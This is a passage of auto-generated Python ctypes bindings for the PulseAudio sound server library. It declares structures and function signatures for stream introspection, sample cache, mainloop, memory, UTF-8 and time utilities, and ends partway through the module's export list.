pa_context_get_sink_input_info.argtypes = [POINTER(pa_context), c_uint32, pa_sink_input_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:588
pa_context_get_sink_input_info_list = _lib.pa_context_get_sink_input_info_list
pa_context_get_sink_input_info_list.restype = POINTER(pa_operation)
pa_context_get_sink_input_info_list.argtypes = [POINTER(pa_context), pa_sink_input_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:591
pa_context_move_sink_input_by_name = _lib.pa_context_move_sink_input_by_name
pa_context_move_sink_input_by_name.restype = POINTER(pa_operation)
pa_context_move_sink_input_by_name.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:594
pa_context_move_sink_input_by_index = _lib.pa_context_move_sink_input_by_index
pa_context_move_sink_input_by_index.restype = POINTER(pa_operation)
pa_context_move_sink_input_by_index.argtypes = [POINTER(pa_context), c_uint32, c_uint32, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:597
pa_context_set_sink_input_volume = _lib.pa_context_set_sink_input_volume
pa_context_set_sink_input_volume.restype = POINTER(pa_operation)
pa_context_set_sink_input_volume.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:600
pa_context_set_sink_input_mute = _lib.pa_context_set_sink_input_mute
pa_context_set_sink_input_mute.restype = POINTER(pa_operation)
pa_context_set_sink_input_mute.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:603
pa_context_kill_sink_input = _lib.pa_context_kill_sink_input
pa_context_kill_sink_input.restype = POINTER(pa_operation)
pa_context_kill_sink_input.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_source_output_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'client',
'source',
'sample_spec',
'channel_map',
'buffer_usec',
'source_usec',
'resample_method',
'driver',
'proplist',
'corked',
'volume',
'mute',
'has_volume',
'volume_writable',
'format',
]
struct_pa_source_output_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('client', c_uint32),
('source', c_uint32),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('buffer_usec', pa_usec_t),
('source_usec', pa_usec_t),
('resample_method', c_char_p),
('driver', c_char_p),
('proplist', POINTER(pa_proplist)),
('corked', c_int),
('volume', pa_cvolume),
('mute', c_int),
('has_volume', c_int),
('volume_writable', c_int),
('format', POINTER(pa_format_info)),
]
pa_source_output_info = struct_pa_source_output_info # /usr/include/pulse/introspect.h:631
pa_source_output_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_source_output_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:634
# /usr/include/pulse/introspect.h:637
pa_context_get_source_output_info = _lib.pa_context_get_source_output_info
pa_context_get_source_output_info.restype = POINTER(pa_operation)
pa_context_get_source_output_info.argtypes = [POINTER(pa_context), c_uint32, pa_source_output_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:640
pa_context_get_source_output_info_list = _lib.pa_context_get_source_output_info_list
pa_context_get_source_output_info_list.restype = POINTER(pa_operation)
pa_context_get_source_output_info_list.argtypes = [POINTER(pa_context), pa_source_output_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:643
pa_context_move_source_output_by_name = _lib.pa_context_move_source_output_by_name
pa_context_move_source_output_by_name.restype = POINTER(pa_operation)
pa_context_move_source_output_by_name.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:646
pa_context_move_source_output_by_index = _lib.pa_context_move_source_output_by_index
pa_context_move_source_output_by_index.restype = POINTER(pa_operation)
pa_context_move_source_output_by_index.argtypes = [POINTER(pa_context), c_uint32, c_uint32, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:649
pa_context_set_source_output_volume = _lib.pa_context_set_source_output_volume
pa_context_set_source_output_volume.restype = POINTER(pa_operation)
pa_context_set_source_output_volume.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:652
pa_context_set_source_output_mute = _lib.pa_context_set_source_output_mute
pa_context_set_source_output_mute.restype = POINTER(pa_operation)
pa_context_set_source_output_mute.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:655
pa_context_kill_source_output = _lib.pa_context_kill_source_output
pa_context_kill_source_output.restype = POINTER(pa_operation)
pa_context_kill_source_output.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_stat_info(Structure):
__slots__ = [
'memblock_total',
'memblock_total_size',
'memblock_allocated',
'memblock_allocated_size',
'scache_size',
]
struct_pa_stat_info._fields_ = [
('memblock_total', c_uint32),
('memblock_total_size', c_uint32),
('memblock_allocated', c_uint32),
('memblock_allocated_size', c_uint32),
('scache_size', c_uint32),
]
pa_stat_info = struct_pa_stat_info # /usr/include/pulse/introspect.h:670
pa_stat_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_stat_info), POINTER(None)) # /usr/include/pulse/introspect.h:673
# /usr/include/pulse/introspect.h:676
pa_context_stat = _lib.pa_context_stat
pa_context_stat.restype = POINTER(pa_operation)
pa_context_stat.argtypes = [POINTER(pa_context), pa_stat_info_cb_t, POINTER(None)]
class struct_pa_sample_info(Structure):
__slots__ = [
'index',
'name',
'volume',
'sample_spec',
'channel_map',
'duration',
'bytes',
'lazy',
'filename',
'proplist',
]
struct_pa_sample_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('volume', pa_cvolume),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('duration', pa_usec_t),
('bytes', c_uint32),
('lazy', c_int),
('filename', c_char_p),
('proplist', POINTER(pa_proplist)),
]
pa_sample_info = struct_pa_sample_info # /usr/include/pulse/introspect.h:696
pa_sample_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_sample_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:699
# /usr/include/pulse/introspect.h:702
pa_context_get_sample_info_by_name = _lib.pa_context_get_sample_info_by_name
pa_context_get_sample_info_by_name.restype = POINTER(pa_operation)
pa_context_get_sample_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_sample_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:705
pa_context_get_sample_info_by_index = _lib.pa_context_get_sample_info_by_index
pa_context_get_sample_info_by_index.restype = POINTER(pa_operation)
pa_context_get_sample_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_sample_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:708
pa_context_get_sample_info_list = _lib.pa_context_get_sample_info_list
pa_context_get_sample_info_list.restype = POINTER(pa_operation)
pa_context_get_sample_info_list.argtypes = [POINTER(pa_context), pa_sample_info_cb_t, POINTER(None)]
enum_pa_autoload_type = c_int
PA_AUTOLOAD_SINK = 0
PA_AUTOLOAD_SOURCE = 1
pa_autoload_type_t = enum_pa_autoload_type # /usr/include/pulse/introspect.h:720
class struct_pa_autoload_info(Structure):
__slots__ = [
'index',
'name',
'type',
'module',
'argument',
]
struct_pa_autoload_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('type', pa_autoload_type_t),
('module', c_char_p),
('argument', c_char_p),
]
pa_autoload_info = struct_pa_autoload_info # /usr/include/pulse/introspect.h:731
pa_autoload_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_autoload_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:734
# /usr/include/pulse/introspect.h:737
pa_context_get_autoload_info_by_name = _lib.pa_context_get_autoload_info_by_name
pa_context_get_autoload_info_by_name.restype = POINTER(pa_operation)
pa_context_get_autoload_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_autoload_type_t, pa_autoload_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:740
pa_context_get_autoload_info_by_index = _lib.pa_context_get_autoload_info_by_index
pa_context_get_autoload_info_by_index.restype = POINTER(pa_operation)
pa_context_get_autoload_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_autoload_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:743
pa_context_get_autoload_info_list = _lib.pa_context_get_autoload_info_list
pa_context_get_autoload_info_list.restype = POINTER(pa_operation)
pa_context_get_autoload_info_list.argtypes = [POINTER(pa_context), pa_autoload_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:746
pa_context_add_autoload = _lib.pa_context_add_autoload
pa_context_add_autoload.restype = POINTER(pa_operation)
pa_context_add_autoload.argtypes = [POINTER(pa_context), c_char_p, pa_autoload_type_t, c_char_p, c_char_p, pa_context_index_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:749
pa_context_remove_autoload_by_name = _lib.pa_context_remove_autoload_by_name
pa_context_remove_autoload_by_name.restype = POINTER(pa_operation)
pa_context_remove_autoload_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_autoload_type_t, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:752
pa_context_remove_autoload_by_index = _lib.pa_context_remove_autoload_by_index
pa_context_remove_autoload_by_index.restype = POINTER(pa_operation)
pa_context_remove_autoload_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
pa_context_subscribe_cb_t = CFUNCTYPE(None, POINTER(pa_context), pa_subscription_event_type_t, c_uint32, POINTER(None)) # /usr/include/pulse/subscribe.h:73
# /usr/include/pulse/subscribe.h:76
pa_context_subscribe = _lib.pa_context_subscribe
pa_context_subscribe.restype = POINTER(pa_operation)
pa_context_subscribe.argtypes = [POINTER(pa_context), pa_subscription_mask_t, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/subscribe.h:79
pa_context_set_subscribe_callback = _lib.pa_context_set_subscribe_callback
pa_context_set_subscribe_callback.restype = None
pa_context_set_subscribe_callback.argtypes = [POINTER(pa_context), pa_context_subscribe_cb_t, POINTER(None)]
pa_context_play_sample_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_uint32, POINTER(None)) # /usr/include/pulse/scache.h:85
# /usr/include/pulse/scache.h:88
pa_stream_connect_upload = _lib.pa_stream_connect_upload
pa_stream_connect_upload.restype = c_int
pa_stream_connect_upload.argtypes = [POINTER(pa_stream), c_size_t]
# /usr/include/pulse/scache.h:93
pa_stream_finish_upload = _lib.pa_stream_finish_upload
pa_stream_finish_upload.restype = c_int
pa_stream_finish_upload.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/scache.h:96
pa_context_remove_sample = _lib.pa_context_remove_sample
pa_context_remove_sample.restype = POINTER(pa_operation)
pa_context_remove_sample.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/scache.h:101
pa_context_play_sample = _lib.pa_context_play_sample
pa_context_play_sample.restype = POINTER(pa_operation)
pa_context_play_sample.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_volume_t, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/scache.h:113
pa_context_play_sample_with_proplist = _lib.pa_context_play_sample_with_proplist
pa_context_play_sample_with_proplist.restype = POINTER(pa_operation)
pa_context_play_sample_with_proplist.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_volume_t, POINTER(pa_proplist), pa_context_play_sample_cb_t, POINTER(None)]
# /usr/include/pulse/error.h:33
pa_strerror = _lib.pa_strerror
pa_strerror.restype = c_char_p
pa_strerror.argtypes = [c_int]
# /usr/include/pulse/xmalloc.h:39
pa_xmalloc = _lib.pa_xmalloc
pa_xmalloc.restype = POINTER(c_void)
pa_xmalloc.argtypes = [c_size_t]
# /usr/include/pulse/xmalloc.h:42
pa_xmalloc0 = _lib.pa_xmalloc0
pa_xmalloc0.restype = POINTER(c_void)
pa_xmalloc0.argtypes = [c_size_t]
# /usr/include/pulse/xmalloc.h:45
pa_xrealloc = _lib.pa_xrealloc
pa_xrealloc.restype = POINTER(c_void)
pa_xrealloc.argtypes = [POINTER(None), c_size_t]
# /usr/include/pulse/xmalloc.h:48
pa_xfree = _lib.pa_xfree
pa_xfree.restype = None
pa_xfree.argtypes = [POINTER(None)]
# /usr/include/pulse/xmalloc.h:51
pa_xstrdup = _lib.pa_xstrdup
pa_xstrdup.restype = c_char_p
pa_xstrdup.argtypes = [c_char_p]
# /usr/include/pulse/xmalloc.h:54
pa_xstrndup = _lib.pa_xstrndup
pa_xstrndup.restype = c_char_p
pa_xstrndup.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/xmalloc.h:57
pa_xmemdup = _lib.pa_xmemdup
pa_xmemdup.restype = POINTER(c_void)
pa_xmemdup.argtypes = [POINTER(None), c_size_t]
# /usr/include/pulse/utf8.h:35
pa_utf8_valid = _lib.pa_utf8_valid
pa_utf8_valid.restype = c_char_p
pa_utf8_valid.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:38
pa_ascii_valid = _lib.pa_ascii_valid
pa_ascii_valid.restype = c_char_p
pa_ascii_valid.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:41
pa_utf8_filter = _lib.pa_utf8_filter
pa_utf8_filter.restype = c_char_p
pa_utf8_filter.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:44
pa_ascii_filter = _lib.pa_ascii_filter
pa_ascii_filter.restype = c_char_p
pa_ascii_filter.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:47
pa_utf8_to_locale = _lib.pa_utf8_to_locale
pa_utf8_to_locale.restype = c_char_p
pa_utf8_to_locale.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:50
pa_locale_to_utf8 = _lib.pa_locale_to_utf8
pa_locale_to_utf8.restype = c_char_p
pa_locale_to_utf8.argtypes = [c_char_p]
class struct_pa_threaded_mainloop(Structure):
__slots__ = [
]
struct_pa_threaded_mainloop._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_threaded_mainloop(Structure):
__slots__ = [
]
struct_pa_threaded_mainloop._fields_ = [
('_opaque_struct', c_int)
]
pa_threaded_mainloop = struct_pa_threaded_mainloop # /usr/include/pulse/thread-mainloop.h:246
# /usr/include/pulse/thread-mainloop.h:251
pa_threaded_mainloop_new = _lib.pa_threaded_mainloop_new
pa_threaded_mainloop_new.restype = POINTER(pa_threaded_mainloop)
pa_threaded_mainloop_new.argtypes = []
# /usr/include/pulse/thread-mainloop.h:256
pa_threaded_mainloop_free = _lib.pa_threaded_mainloop_free
pa_threaded_mainloop_free.restype = None
pa_threaded_mainloop_free.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:259
pa_threaded_mainloop_start = _lib.pa_threaded_mainloop_start
pa_threaded_mainloop_start.restype = c_int
pa_threaded_mainloop_start.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:263
pa_threaded_mainloop_stop = _lib.pa_threaded_mainloop_stop
pa_threaded_mainloop_stop.restype = None
pa_threaded_mainloop_stop.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:271
pa_threaded_mainloop_lock = _lib.pa_threaded_mainloop_lock
pa_threaded_mainloop_lock.restype = None
pa_threaded_mainloop_lock.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:274
pa_threaded_mainloop_unlock = _lib.pa_threaded_mainloop_unlock
pa_threaded_mainloop_unlock.restype = None
pa_threaded_mainloop_unlock.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:285
pa_threaded_mainloop_wait = _lib.pa_threaded_mainloop_wait
pa_threaded_mainloop_wait.restype = None
pa_threaded_mainloop_wait.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:292
pa_threaded_mainloop_signal = _lib.pa_threaded_mainloop_signal
pa_threaded_mainloop_signal.restype = None
pa_threaded_mainloop_signal.argtypes = [POINTER(pa_threaded_mainloop), c_int]
# /usr/include/pulse/thread-mainloop.h:298
pa_threaded_mainloop_accept = _lib.pa_threaded_mainloop_accept
pa_threaded_mainloop_accept.restype = None
pa_threaded_mainloop_accept.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:302
pa_threaded_mainloop_get_retval = _lib.pa_threaded_mainloop_get_retval
pa_threaded_mainloop_get_retval.restype = c_int
pa_threaded_mainloop_get_retval.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:307
pa_threaded_mainloop_get_api = _lib.pa_threaded_mainloop_get_api
pa_threaded_mainloop_get_api.restype = POINTER(pa_mainloop_api)
pa_threaded_mainloop_get_api.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:310
pa_threaded_mainloop_in_thread = _lib.pa_threaded_mainloop_in_thread
pa_threaded_mainloop_in_thread.restype = c_int
pa_threaded_mainloop_in_thread.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:313
#pa_threaded_mainloop_set_name = _lib.pa_threaded_mainloop_set_name
#pa_threaded_mainloop_set_name.restype = None
#pa_threaded_mainloop_set_name.argtypes = [POINTER(pa_threaded_mainloop), c_char_p]
class struct_pa_mainloop(Structure):
__slots__ = [
]
struct_pa_mainloop._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_mainloop(Structure):
__slots__ = [
]
struct_pa_mainloop._fields_ = [
('_opaque_struct', c_int)
]
pa_mainloop = struct_pa_mainloop # /usr/include/pulse/mainloop.h:78
# /usr/include/pulse/mainloop.h:81
pa_mainloop_new = _lib.pa_mainloop_new
pa_mainloop_new.restype = POINTER(pa_mainloop)
pa_mainloop_new.argtypes = []
# /usr/include/pulse/mainloop.h:84
pa_mainloop_free = _lib.pa_mainloop_free
pa_mainloop_free.restype = None
pa_mainloop_free.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:89
pa_mainloop_prepare = _lib.pa_mainloop_prepare
pa_mainloop_prepare.restype = c_int
pa_mainloop_prepare.argtypes = [POINTER(pa_mainloop), c_int]
# /usr/include/pulse/mainloop.h:92
pa_mainloop_poll = _lib.pa_mainloop_poll
pa_mainloop_poll.restype = c_int
pa_mainloop_poll.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:96
pa_mainloop_dispatch = _lib.pa_mainloop_dispatch
pa_mainloop_dispatch.restype = c_int
pa_mainloop_dispatch.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:99
pa_mainloop_get_retval = _lib.pa_mainloop_get_retval
pa_mainloop_get_retval.restype = c_int
pa_mainloop_get_retval.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:107
pa_mainloop_iterate = _lib.pa_mainloop_iterate
pa_mainloop_iterate.restype = c_int
pa_mainloop_iterate.argtypes = [POINTER(pa_mainloop), c_int, POINTER(c_int)]
# /usr/include/pulse/mainloop.h:110
pa_mainloop_run = _lib.pa_mainloop_run
pa_mainloop_run.restype = c_int
pa_mainloop_run.argtypes = [POINTER(pa_mainloop), POINTER(c_int)]
# /usr/include/pulse/mainloop.h:115
pa_mainloop_get_api = _lib.pa_mainloop_get_api
pa_mainloop_get_api.restype = POINTER(pa_mainloop_api)
pa_mainloop_get_api.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:118
pa_mainloop_quit = _lib.pa_mainloop_quit
pa_mainloop_quit.restype = None
pa_mainloop_quit.argtypes = [POINTER(pa_mainloop), c_int]
# /usr/include/pulse/mainloop.h:121
pa_mainloop_wakeup = _lib.pa_mainloop_wakeup
pa_mainloop_wakeup.restype = None
pa_mainloop_wakeup.argtypes = [POINTER(pa_mainloop)]
class struct_pollfd(Structure):
__slots__ = [
]
struct_pollfd._fields_ = [
('_opaque_struct', c_int)
]
class struct_pollfd(Structure):
__slots__ = [
]
struct_pollfd._fields_ = [
('_opaque_struct', c_int)
]
pa_poll_func = CFUNCTYPE(c_int, POINTER(struct_pollfd), c_ulong, c_int, POINTER(None)) # /usr/include/pulse/mainloop.h:124
# /usr/include/pulse/mainloop.h:127
pa_mainloop_set_poll_func = _lib.pa_mainloop_set_poll_func
pa_mainloop_set_poll_func.restype = None
pa_mainloop_set_poll_func.argtypes = [POINTER(pa_mainloop), pa_poll_func, POINTER(None)]
class struct_pa_signal_event(Structure):
__slots__ = [
]
struct_pa_signal_event._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_signal_event(Structure):
__slots__ = [
]
struct_pa_signal_event._fields_ = [
('_opaque_struct', c_int)
]
pa_signal_event = struct_pa_signal_event # /usr/include/pulse/mainloop-signal.h:39
pa_signal_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_signal_event), c_int, POINTER(None)) # /usr/include/pulse/mainloop-signal.h:42
pa_signal_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_signal_event), POINTER(None)) # /usr/include/pulse/mainloop-signal.h:45
# /usr/include/pulse/mainloop-signal.h:48
pa_signal_init = _lib.pa_signal_init
pa_signal_init.restype = c_int
pa_signal_init.argtypes = [POINTER(pa_mainloop_api)]
# /usr/include/pulse/mainloop-signal.h:51
pa_signal_done = _lib.pa_signal_done
pa_signal_done.restype = None
pa_signal_done.argtypes = []
# /usr/include/pulse/mainloop-signal.h:54
pa_signal_new = _lib.pa_signal_new
pa_signal_new.restype = POINTER(pa_signal_event)
pa_signal_new.argtypes = [c_int, pa_signal_cb_t, POINTER(None)]
# /usr/include/pulse/mainloop-signal.h:57
pa_signal_free = _lib.pa_signal_free
pa_signal_free.restype = None
pa_signal_free.argtypes = [POINTER(pa_signal_event)]
# /usr/include/pulse/mainloop-signal.h:60
pa_signal_set_destroy = _lib.pa_signal_set_destroy
pa_signal_set_destroy.restype = None
pa_signal_set_destroy.argtypes = [POINTER(pa_signal_event), pa_signal_destroy_cb_t]
# /usr/include/pulse/util.h:35
pa_get_user_name = _lib.pa_get_user_name
pa_get_user_name.restype = c_char_p
pa_get_user_name.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:38
pa_get_host_name = _lib.pa_get_host_name
pa_get_host_name.restype = c_char_p
pa_get_host_name.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:41
pa_get_fqdn = _lib.pa_get_fqdn
pa_get_fqdn.restype = c_char_p
pa_get_fqdn.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:44
pa_get_home_dir = _lib.pa_get_home_dir
pa_get_home_dir.restype = c_char_p
pa_get_home_dir.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:48
pa_get_binary_name = _lib.pa_get_binary_name
pa_get_binary_name.restype = c_char_p
pa_get_binary_name.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:52
pa_path_get_filename = _lib.pa_path_get_filename
pa_path_get_filename.restype = c_char_p
pa_path_get_filename.argtypes = [c_char_p]
# /usr/include/pulse/util.h:55
pa_msleep = _lib.pa_msleep
pa_msleep.restype = c_int
pa_msleep.argtypes = [c_ulong]
# /usr/include/pulse/timeval.h:61
pa_gettimeofday = _lib.pa_gettimeofday
pa_gettimeofday.restype = POINTER(struct_timeval)
pa_gettimeofday.argtypes = [POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:65
pa_timeval_diff = _lib.pa_timeval_diff
pa_timeval_diff.restype = pa_usec_t
pa_timeval_diff.argtypes = [POINTER(struct_timeval), POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:68
pa_timeval_cmp = _lib.pa_timeval_cmp
pa_timeval_cmp.restype = c_int
pa_timeval_cmp.argtypes = [POINTER(struct_timeval), POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:71
pa_timeval_age = _lib.pa_timeval_age
pa_timeval_age.restype = pa_usec_t
pa_timeval_age.argtypes = [POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:74
pa_timeval_add = _lib.pa_timeval_add
pa_timeval_add.restype = POINTER(struct_timeval)
pa_timeval_add.argtypes = [POINTER(struct_timeval), pa_usec_t]
# /usr/include/pulse/timeval.h:77
pa_timeval_sub = _lib.pa_timeval_sub
pa_timeval_sub.restype = POINTER(struct_timeval)
pa_timeval_sub.argtypes = [POINTER(struct_timeval), pa_usec_t]
# /usr/include/pulse/timeval.h:80
pa_timeval_store = _lib.pa_timeval_store
pa_timeval_store.restype = POINTER(struct_timeval)
pa_timeval_store.argtypes = [POINTER(struct_timeval), pa_usec_t]
# /usr/include/pulse/timeval.h:83
pa_timeval_load = _lib.pa_timeval_load
pa_timeval_load.restype = pa_usec_t
pa_timeval_load.argtypes = [POINTER(struct_timeval)]
__all__ = ['pa_get_library_version', 'PA_API_VERSION', 'PA_PROTOCOL_VERSION',
'PA_MAJOR', 'PA_MINOR', 'PA_MICRO', 'PA_CHANNELS_MAX', 'PA_RATE_MAX',
'pa_sample_format_t', 'PA_SAMPLE_U8', 'PA_SAMPLE_ALAW', 'PA_SAMPLE_ULAW',
'PA_SAMPLE_S16LE', 'PA_SAMPLE_S16BE', 'PA_SAMPLE_FLOAT32LE',
'PA_SAMPLE_FLOAT32BE', 'PA_SAMPLE_S32LE', 'PA_SAMPLE_S32BE',
'PA_SAMPLE_S24LE', 'PA_SAMPLE_S24BE', 'PA_SAMPLE_S24_32LE',
'PA_SAMPLE_S24_32BE', 'PA_SAMPLE_MAX', 'PA_SAMPLE_INVALID', 'pa_sample_spec',
'pa_usec_t', 'pa_bytes_per_second', 'pa_frame_size', 'pa_sample_size',
'pa_sample_size_of_format', 'pa_bytes_to_usec', 'pa_usec_to_bytes',
'pa_sample_spec_init', 'pa_sample_format_valid', 'pa_sample_rate_valid',
'pa_channels_valid', 'pa_sample_spec_valid', 'pa_sample_spec_equal',
'pa_sample_format_to_string', 'pa_parse_sample_format',
'PA_SAMPLE_SPEC_SNPRINT_MAX', 'pa_sample_spec_snprint',
'PA_BYTES_SNPRINT_MAX', 'pa_bytes_snprint', 'pa_sample_format_is_le',
'pa_sample_format_is_be', 'pa_context_state_t', 'PA_CONTEXT_UNCONNECTED',
'PA_CONTEXT_CONNECTING', 'PA_CONTEXT_AUTHORIZING', 'PA_CONTEXT_SETTING_NAME',
'PA_CONTEXT_READY', 'PA_CONTEXT_FAILED', 'PA_CONTEXT_TERMINATED',
'pa_stream_state_t', 'PA_STREAM_UNCONNECTED', 'PA_STREAM_CREATING',
'PA_STREAM_READY', 'PA_STREAM_FAILED', 'PA_STREAM_TERMINATED',
'pa_operation_state_t', 'PA_OPERATION_RUNNING', 'PA_OPERATION_DONE',
'PA_OPERATION_CANCELLED', 'pa_context_flags_t', 'PA_CONTEXT_NOFLAGS',
'PA_CONTEXT_NOAUTOSPAWN', 'PA_CONTEXT_NOFAIL', 'pa_direction_t',
'PA_DIRECTION_OUTPUT', 'PA_DIRECTION_INPUT', 'pa_device_type_t',
'PA_DEVICE_TYPE_SINK', 'PA_DEVICE_TYPE_SOURCE', 'pa_stream_direction_t',
'PA_STREAM_NODIRECTION', 'PA_STREAM_PLAYBACK', 'PA_STREAM_RECORD',
'PA_STREAM_UPLOAD', 'pa_stream_flags_t', 'PA_STREAM_NOFLAGS',
'PA_STREAM_START_CORKED', 'PA_STREAM_INTERPOLATE_TIMING',
'PA_STREAM_NOT_MONOTONIC', 'PA_STREAM_AUTO_TIMING_UPDATE',
'PA_STREAM_NO_REMAP_CHANNELS', 'PA_STREAM_NO_REMIX_CHANNELS',
'PA_STREAM_FIX_FORMAT', 'PA_STREAM_FIX_RATE', 'PA_STREAM_FIX_CHANNELS',
'PA_STREAM_DONT_MOVE', 'PA_STREAM_VARIABLE_RATE', 'PA_STREAM_PEAK_DETECT',
'PA_STREAM_START_MUTED', 'PA_STREAM_ADJUST_LATENCY',
'PA_STREAM_EARLY_REQUESTS', 'PA_STREAM_DONT_INHIBIT_AUTO_SUSPEND',
'PA_STREAM_START_UNMUTED', 'PA_STREAM_FAIL_ON_SUSPEND',
'PA_STREAM_RELATIVE_VOLUME', 'PA_STREAM_PASSTHROUGH', 'pa_buffer_attr',
'pa_error_code_t', 'PA_OK', 'PA_ERR_ACCESS', 'PA_ERR_COMMAND',
'PA_ERR_INVALID', 'PA_ERR_EXIST', 'PA_ERR_NOENTITY',
'PA_ERR_CONNECTIONREFUSED', 'PA_ERR_PROTOCOL', 'PA_ERR_TIMEOUT',
'PA_ERR_AUTHKEY', 'PA_ERR_INTERNAL', 'PA_ERR_CONNECTIONTERMINATED',
'PA_ERR_KILLED', 'PA_ERR_INVALIDSERVER', 'PA_ERR_MODINITFAILED',
'PA_ERR_BADSTATE', 'PA_ERR_NODATA', 'PA_ERR_VERSION', 'PA_ERR_TOOLARGE',
'PA_ERR_NOTSUPPORTED', 'PA_ERR_UNKNOWN', 'PA_ERR_NOEXTENSION',
'PA_ERR_OBSOLETE', 'PA_ERR_NOTIMPLEMENTED', 'PA_ERR_FORKED', 'PA_ERR_IO',
'PA_ERR_BUSY', 'PA_ERR_MAX', 'pa_subscription_mask_t',
'PA_SUBSCRIPTION_MASK_NULL', 'PA_SUBSCRIPTION_MASK_SINK',
'PA_SUBSCRIPTION_MASK_SOURCE', 'PA_SUBSCRIPTION_MASK_SINK_INPUT',
'PA_SUBSCRIPTION_MASK_SOURCE_OUTPUT', 'PA_SUBSCRIPTION_MASK_MODULE',
